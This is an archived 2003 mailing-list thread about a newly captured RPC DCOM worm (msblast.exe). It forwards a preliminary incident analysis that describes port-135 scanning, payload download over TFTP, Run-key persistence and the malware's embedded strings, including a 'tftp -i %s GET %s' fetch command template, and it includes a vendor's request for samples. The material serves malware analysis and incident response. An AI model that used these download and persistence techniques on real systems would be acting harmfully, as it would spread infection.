[secure] From Incidents.org - possible Dcom worm

Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP] sbradcpa at pacbell.net
Mon Aug 11 19:23:23 GMT 2003


Hi!  It's it possible to forward the binaries for this worm ....or... whom
were you working with at Microsoft on this possible Dcom worm?

Bill is wanting a copy of the binaries if you have them handy.

Bill Sisk wrote:

> Susan,
>
> Can you forward the binaries so that we can investigate?
>
> Bill Sisk
> PSS Security
>
> -----Original Message-----
> From: Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]
> [mailto:sbradcpa at pacbell.net]
> Sent: Monday, August 11, 2003 12:07 PM
>
> Subject: [secure] From Incidents.org - possible Dcom worm
>
> http://isc.sans.org/diary.html?date=2003-08-11
>
> We catpured a possible RPC DCOM worm. Preliminary analysis:
>
> **********
> NOTE: PRELIMINARY. Do not base your incidents response solely on this
> writeup.
> **********
>
> The worm uses the RPC DCOM vulnerability to propagate. One it finds a
> vulnerable
> system, it will spawn a shell and use it to download the actual worm via
> tftp.
>
> The name of the binary is msblast.exe. It is packed with UPX and will
> self
> extract. The size of the binary is about 11kByte unpacked, and 6kBytes
> packed:
>
> MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)
>
> So far we found the following properties:
>
> - Scans sequentially for machines with open port 135, starting at a
> presumably
> random IP address
> - uses multiple TFTP servers to pull the binary
> - adds a registery key to start itself after reboot
>
> Name of registry key:
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run, name: 'windows auto
> update'
>
> Strings of interest:
>
> msblast.exe
> I just want to say LOVE YOU SAN!!
> billy gates why do you make this possible ? Stop making money and fix
> your
> software!!
> windowsupdate.com
> start %s
> tftp -i %s GET %s
> %d.%d.%d.%d
> %i.%i.%i.%i
> BILLY
> windows auto update
> SOFTWARE\Microsoft\Windows\CurrentVersion\Run
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: secure-unsubscribe at msmvps.com
> For additional commands, e-mail: secure-help at msmvps.com

--
"Don't lose sight of security. Security is a state of being,
not a state of budget. He with the most firewalls still does
not win. Put down that honeypot and keep up to date on your
patches. Demand better security from vendors and hold them
responsible. Use what you have, and make sure you know how
to use it properly and effectively."
~Rain Forest Puppy
http://www.wiretrip.net/rfp/txt/evolution.txt




More information about the unisog mailing list